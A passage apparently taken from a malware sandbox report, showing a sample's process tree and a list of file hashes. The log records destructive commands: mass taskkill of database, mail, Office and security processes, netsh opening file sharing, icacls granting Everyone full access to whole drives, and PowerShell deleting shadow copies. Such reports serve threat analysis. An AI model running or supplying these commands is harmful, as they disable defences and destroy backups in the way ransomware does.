C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F3⤵PID:1100
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F3⤵
- Kills process with taskkill
PID:5332
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F3⤵PID:2920
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F3⤵PID:4540
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F3⤵
- Kills process with taskkill
PID:2288
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F3⤵PID:4264
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F3⤵
- Kills process with taskkill
PID:5436
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F3⤵PID:5888
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F3⤵PID:5960
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F3⤵PID:4128
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F3⤵PID:5492
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F3⤵PID:1424
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F3⤵PID:1312
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F3⤵PID:3856
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F3⤵PID:5180
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F3⤵PID:4316
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
PID:4204
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F3⤵
- Kills process with taskkill
PID:4296
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F3⤵PID:5396
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F3⤵PID:4244
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F3⤵PID:1680
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
PID:5796
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F3⤵
- Kills process with taskkill
PID:5556
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F3⤵
- Kills process with taskkill
PID:4364
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F3⤵
- Kills process with taskkill
PID:4720
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F3⤵PID:6132
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵PID:4260
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F3⤵PID:4868
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f3⤵
- Kills process with taskkill
PID:2832
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f3⤵
- Kills process with taskkill
PID:5936
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f3⤵PID:4232
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f3⤵PID:4240
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f3⤵PID:5028
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f3⤵PID:4492
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:6000
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5296
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:6008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }3⤵PID:2672
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
7c38b34cb7f683c16b1c83ba2b1f4d57
SHA1da6c06e516ff22e3c194d35bc8d5a77a99a7d0e7
SHA256189935ab7915851fc856d4f07190b8bff9bb6dec120e61662da025f0cc564a28
SHA51226eb71925336e318467cc0d3b91e14522c755901fd67765bc7d9dd129fcb06e19f5255fc8783f8e22794b99be0d08ee075c057bcaeb69b05468d299dc656da8c
-
MD5
42360849c5552327d2dfd978d9cc82dc
SHA1a73729c13640858d6043670313fd52a8984a3b29
SHA25656291880e6774b42524a035701d8d91ec71cdd03c09e832122b56ed22a149282
SHA512093e1de8bc0912420b9bd5d7a65889ab9c0a6cc9ed2c2cd553086b15a9c4dda412f1b4f71f77d6e7337e020082a0fe290d1b313354e3a92cc83c162d2afc1100
-
MD5
6dbb50d160f620718fd6a24204f80219
SHA1d0f137f0a037deff1c654a46be42baef3a2dc164
SHA2562df7a289e804f48fd5ad07a984759138e9e28f73e97f50c6f357d4ea75bd9b8a
SHA512e928745f673d4dc98741c2baa68eba8b3f32d8252c9fd8e0ed71f5d5699a0de55e0ddfa5bd36ebd007f0e7a547bf76b949469b97897c4dc0f7a7931e7b5d0e1b
-
MD5
eee8d9c85f184c85980e86a4a50b36d5
SHA1f5cd1c02f07b458d485673435bdaa77c0c156200
SHA256a36ed39275c90b7828170a291bffcdccbcd75439537aa9588e638f59da160124
SHA512009851f3f8eb8bfbf5659b7faf9c134cd4840845db5cc44729fb5ff0cafa43ce2b190130113fc400d972430875d9d534c6d4e0b8201375392a673e65e0056e2a
-
MD5
eee8d9c85f184c85980e86a4a50b36d5
SHA1f5cd1c02f07b458d485673435bdaa77c0c156200
SHA256a36ed39275c90b7828170a291bffcdccbcd75439537aa9588e638f59da160124
SHA512009851f3f8eb8bfbf5659b7faf9c134cd4840845db5cc44729fb5ff0cafa43ce2b190130113fc400d972430875d9d534c6d4e0b8201375392a673e65e0056e2a
-
MD5
dd2a41c0c9ef4c7c3efc17352b353dcc
SHA103df1fbc7ab3b057f0e2ff60da6328ec8e4d7bb2
SHA256b4cb316ba6b694d2be8201770a5e034a79015a61364059e129fe34be5798bee6
SHA512098aea8de8f8a04232ecc2f975e8ef8e77351151bcdbf1174d202fb82ac3ef94ab508dd3678a41450c05249f6b91a936971a717877aca1b626440e663f47c735
-
MD5
c9abb8e80d24b58b42a92099265e7764
SHA12dea4540fc3a5c8a983731f9f2aed727c802335f
SHA2568b64398533c303924f100de478b9528fd672df14573ec19702fe2fa3a6bbfcfd
SHA5121e6bb7e9fadb10f80e7c9060a61a0818240268864a605da03e25acc0c9100658cd30d4d1edda1f48fc342738a15c06d2a849b4e76f865e0b174eab0af039a43f
-
MD5
c9abb8e80d24b58b42a92099265e7764
SHA12dea4540fc3a5c8a983731f9f2aed727c802335f
SHA2568b64398533c303924f100de478b9528fd672df14573ec19702fe2fa3a6bbfcfd
SHA5121e6bb7e9fadb10f80e7c9060a61a0818240268864a605da03e25acc0c9100658cd30d4d1edda1f48fc342738a15c06d2a849b4e76f865e0b174eab0af039a43f
-
MD5
bf15090c43313bfc6c653de1efa483f2
SHA144a64901057735e98c5ac8b4cc1efc170f8f5ce4
SHA2564e93bac0afd31e7a1c8925c1f727dce82eb09325ef10e9d0873880cfd6225b9c
SHA512708ae93fc9e7f27c637932870831bf43ee167d9d67ffac31c46335b1fb93cce5f7ec5ef9751b5d63fe90c061ad1568624f61e18e601a63c45e8e897322592cda
-
MD5
bf15090c43313bfc6c653de1efa483f2
SHA144a64901057735e98c5ac8b4cc1efc170f8f5ce4
SHA2564e93bac0afd31e7a1c8925c1f727dce82eb09325ef10e9d0873880cfd6225b9c
SHA512708ae93fc9e7f27c637932870831bf43ee167d9d67ffac31c46335b1fb93cce5f7ec5ef9751b5d63fe90c061ad1568624f61e18e601a63c45e8e897322592cda
-
MD5
77cc100c43e2bb7622ecd0e9e57c1088
SHA12a39736f7d51f78e063e81dd0a2d8d29898cc4ca
SHA256eee5b0fb66614709e27bfdf53a76d4b6400d01b5e30bc14eaeff2f0554a9ff9e
SHA51253886e0b9b6140a9683225873f1856fa2dc0eb7daf388b58c48be62ed688d8fa4232eadf76a00f0681bf62cbc142dd9a7f033121d1bd3a7490ba60d85ca6b1af
-
MD5
77cc100c43e2bb7622ecd0e9e57c1088
SHA12a39736f7d51f78e063e81dd0a2d8d29898cc4ca
SHA256eee5b0fb66614709e27bfdf53a76d4b6400d01b5e30bc14eaeff2f0554a9ff9e
SHA51253886e0b9b6140a9683225873f1856fa2dc0eb7daf388b58c48be62ed688d8fa4232eadf76a00f0681bf62cbc142dd9a7f033121d1bd3a7490ba60d85ca6b1af
-
MD5
b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2
-
MD5
b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2
-
MD5
b12920c52ea917ad0cad160b5df930bc
SHA114471d2672f0d568349ad65c8c0a14e6169deaf7
SHA2566bee9820dfff1b12b73288bf1d27561c6547d8f18fc6262707163bf6ca1917de
SHA5128c4a9132a0808147e7c1f479415a413f573dcc62c6414323de63b09eef810d1cbcde7b7fd0cd2b6324b839fddb55c626cde0734e99738178119fef6c32da7476